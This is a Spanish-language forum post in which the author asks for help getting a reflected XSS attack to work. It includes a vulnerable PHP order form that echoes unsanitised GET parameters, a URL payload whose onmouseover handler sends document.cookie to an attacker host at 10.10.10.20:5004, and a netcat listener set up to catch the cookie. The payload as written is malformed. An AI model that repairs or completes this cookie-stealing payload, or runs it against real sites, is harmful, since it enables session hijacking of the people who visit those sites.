Autor
Hola a todos, estoy tratando de realizar un xss persistente y no logro dar con la solucion, probablemente es un problema de same origin...
esto es lo que tengo...
Tengo un server con:
------------------------------
<?php
if (isset($_GET['quantity'])) {
$quantity = $_GET['quantity'];
$item = $_GET['item'];
echo "You ordered ". $quantity . " " . $item . ".<br />";
setcookie("Ordering", $_GET['item'], time() + 31536000);
print_r($_COOKIE);
}
echo ('
<html><body>
<h4>Tizag Art Supply Order Form</h4>
<form action="y.php" method="get">
<select name="item">
<option>Paint</option>
<option>Brushes</option>
<option>Erasers</option>
</select>
Quantity: <input name="quantity" type="text" />
<input type="submit" />
</form>
</body></html>
');
?>
------------------------------
Tengo un browser que inyecta en el url:
http://10.10.10.10/prueba.php?item=Paint&quantity=999 <a onmouseover="document.location='http://10.10.10.20:5004/'document.cookie;">now </a>
Y tengo en 10.10.10.20 un nc -l -p 5004 en espera de la peticion
Cuando un maquina de la ip 10.10.10.30 ingresa a la 10.10.10.10 y pasa el mouse por "now" llega la informacion a netcat pero no la cookie....
Que hago mal? gracias
|
 |
Bienvenido(a), Visitante. Por favor Ingresar o Registrarse ¿Perdiste tu email de activación?. |
En línea
